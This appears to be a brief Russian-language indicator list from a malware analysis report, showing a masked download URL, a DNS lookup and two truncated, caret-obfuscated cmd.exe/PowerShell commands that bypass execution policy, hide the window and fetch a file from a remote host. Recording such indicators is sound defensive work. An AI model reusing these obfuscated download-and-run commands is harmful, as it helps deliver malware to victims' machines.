Техническая информация
- http://mo####helthc.top/read.php?f=### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wers^HElL.E^XE ^-E^x^eCU^tiOn^pOlICY B^y^PAs^S -^NOproFi^Le -^Wind^OwSty^LE hi^D^D^E^N^ ^(NEw-oBje^C^T ^S^y^STEM^.^Net.^w^eBcLIENt^)^.d^O^W^nL^O^AdF^I^lE('http://mo####helt...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "pO^wers^HElL.E^XE ^-E^x^eCU^tiOn^pOlICY B^y^PAs^S -^NOproFi^Le -^Wind^OwSty^LE hi^D^D^E^N^ ^(NEw-oBje^C^T ^S^y^STEM^.^Net.^w^eBcLIENt^)^.d^O^W^nL^O^AdF^I^lE('http://mo####helt...' (со скрытым окном)